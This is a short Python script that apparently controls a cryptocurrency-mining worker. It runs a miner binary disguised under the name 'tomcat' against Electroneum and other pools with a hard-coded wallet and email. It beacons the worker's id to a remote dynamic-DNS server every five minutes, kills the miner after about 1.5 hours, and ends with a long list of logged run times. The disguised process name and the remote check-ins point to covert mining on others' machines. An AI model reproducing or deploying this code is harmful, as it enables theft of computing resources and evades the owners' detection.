import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:04.868921
#2018-02-17 17:32:05.835005
#2018-02-17 19:20:06.771769
#2018-02-17 21:11:07.394861
#2018-02-17 22:54:05.493637
#2018-02-18 00:38:06.322205
#2018-02-18 02:29:03.738352
#2018-02-18 04:16:05.910901
#2018-02-18 06:08:05.768161
#2018-02-18 07:59:05.476277
#2018-02-18 09:47:05.771990
#2018-02-18 11:34:05.197269
#2018-02-18 13:20:01.672479
#2018-02-18 15:09:06.954018
#2018-02-18 16:57:06.139057
#2018-02-18 18:44:07.297897
#2018-02-18 20:32:01.592732
#2018-02-18 22:17:06.337221
#2018-02-19 00:06:04.314814
#2018-02-19 01:52:06.730807
#2018-02-19 03:39:04.156004
#2018-02-19 05:24:05.118748
#2018-02-19 07:13:05.735841
#2018-02-19 09:03:05.761616
#2018-02-19 10:52:04.968715
#2018-02-19 12:42:08.971648
#2018-02-19 14:31:02.063384
#2018-02-19 16:19:01.513157
#2018-02-19 18:05:10.741941
#2018-02-19 19:51:07.140350
#2018-02-19 21:40:09.511530
#2018-02-19 23:26:03.911189
#2018-02-20 01:12:01.367054
#2018-02-20 03:02:04.739954
#2018-02-20 04:51:06.175801
#2018-02-20 06:33:07.732195
#2018-02-20 08:18:05.633781
#2018-02-20 10:03:07.852922
#2018-02-20 11:47:01.819666
#2018-02-20 13:34:06.751637
#2018-02-20 15:17:06.915176
#2018-02-20 17:02:08.280478
#2018-02-20 18:51:02.224552
#2018-02-20 20:42:01.826143
#2018-02-20 22:27:04.210702
#2018-02-21 00:08:04.430122
#2018-02-21 01:55:06.101032
#2018-02-21 03:43:05.744803
#2018-02-21 05:31:06.612972
#2018-02-21 07:20:06.772568
#2018-02-21 09:05:01.375087
#2018-02-21 10:53:05.640189
#2018-02-21 12:40:09.568033
#2018-02-21 14:28:09.233604
#2018-02-21 16:16:06.409898
#2018-02-21 18:06:05.700351
#2018-02-21 19:54:07.426803
#2018-02-21 21:42:06.637188
#2018-02-21 23:29:02.206787
#2018-02-22 01:18:02.048205
#2018-02-22 03:07:01.972578
#2018-02-22 04:51:05.384891
#2018-02-22 06:36:06.499119
#2018-02-22 08:24:01.879588
#2018-02-22 10:11:07.303653
#2018-02-22 11:57:07.793052
#2018-02-22 13:42:04.567475
#2018-02-22 15:31:09.674096
#2018-02-22 17:17:06.384816
#2018-02-22 19:05:10.333527
#2018-02-22 20:58:01.786727
#2018-02-22 22:43:05.707337
#2018-02-23 00:31:01.911880
#2018-02-23 02:17:04.151299
#2018-02-23 04:06:05.364844
#2018-02-23 05:52:06.185982
#2018-02-23 07:43:01.623513
#2018-02-23 09:47:05.063710
#2018-02-23 11:47:09.685788
#2018-02-23 13:37:01.934410
#2018-02-23 15:24:02.006412
#2018-02-23 17:14:04.038340
#2018-02-23 18:57:08.387057
#2018-02-23 20:45:08.802245
#2018-02-23 22:34:01.724409
#2018-02-24 00:20:09.225278
#2018-02-24 02:12:06.138150
#2018-02-24 04:03:02.262560
#2018-02-24 05:48:05.556347
#2018-02-24 07:39:05.600577
#2018-02-24 09:25:01.499586
#2018-02-24 11:18:05.887324
#2018-02-24 13:07:06.740019
#2018-02-24 14:56:07.579498
#2018-02-24 16:46:05.140376
#2018-02-24 18:34:03.573282
#2018-02-24 20:21:01.367291
#2018-02-24 22:18:01.455544
#2018-02-25 01:26:04.427343
#2018-02-25 05:16:03.226994
#2018-02-25 11:18:01.532179